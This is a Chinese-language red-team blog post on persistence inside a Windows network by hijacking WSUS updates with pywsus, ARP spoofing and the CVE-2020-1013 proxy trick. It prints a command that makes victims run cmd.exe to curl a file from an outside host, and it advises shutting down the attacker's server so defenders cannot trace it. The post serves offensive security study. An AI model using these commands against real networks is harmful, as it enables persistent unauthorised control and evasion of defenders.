【红蓝攻防】红队中的内网权限维持

  • A+
所属分类:安全文章

在15年的黑帽大会中,Paul Stone 、Alex Chapman 提出了通过劫持Windows Server Update Service(WSUS)并利用中间人攻击,模拟WSUS服务端,在Windows自动更新时执行恶意命令。


大致流程图如下所示:

【红蓝攻防】红队中的内网权限维持


由于WSUS默认是基于http的,所以我们可以通过脚本伪造一个恶意的WSUS地址

python pywsus.py -H 0.0.0.0 -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "curl http://www.0-sec.org:8080/0-sec.txt -o c:\0-sec.txt"


【红蓝攻防】红队中的内网权限维持


并且通过bettercap进行arp欺骗


【红蓝攻防】红队中的内网权限维持


默认Windows会配备20小时左右定时检查更新,我们也可以通过手动输入命令进行强制更新。

usoclient StartInteractiveScan

【红蓝攻防】红队中的内网权限维持


当自动更新时,我们可以注入恶意命令。


【红蓝攻防】红队中的内网权限维持


【红蓝攻防】红队中的内网权限维持



由CVE-2020-1013引发的思考:


2016年,Steve Breen记录了一个名为“ Hot Potato”的漏洞。简而言之,此漏洞使攻击者可以滥用Windows系统服务来执行HTTP到SMB的中继并提升权限。


我们再参考一下CVE-2020-1013,调试Windows 10版本的WSUSpect-proxy时,然后发现可以简单地通过设置Internet Explorer的代理为我们控制的主机,进而转发Windows Update流量内容。


在Windows 10计算机成功移植WSUSpect-proxy模块后,我们怀疑这种行为是否可以用于其他目的,例如本地提权,或者执行恶意命令。


假设我们有权限修改本地用户代理,并且Windows Updates使用Internet Explorer设置中配置的代理,那么我们就可以在本地拦截WSUS流量,并且注入恶意代码程序,同时设置Windows更新为每20小时更新一次。


也就是说,这台机子会每20小时就会执行一次我们的恶意命令,且不需要再进行arp欺骗,就可而达到权限维持的目的。


我们可以通过外网起一个恶意的http服务,并且内含恶意代码文件,通过计算好WSUS的更新时间点,在每次更新前开启http服务,使其下载并运行我们的恶意文件。下载结束后关掉http防止蓝队溯源,以此来达到权限维持的目的。


【红蓝攻防】红队中的内网权限维持


【红蓝攻防】红队中的内网权限维持


参考链接


https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf


https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf


https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/


https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

本文始发于微信公众号(零组攻防实验室):【红蓝攻防】红队中的内网权限维持

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: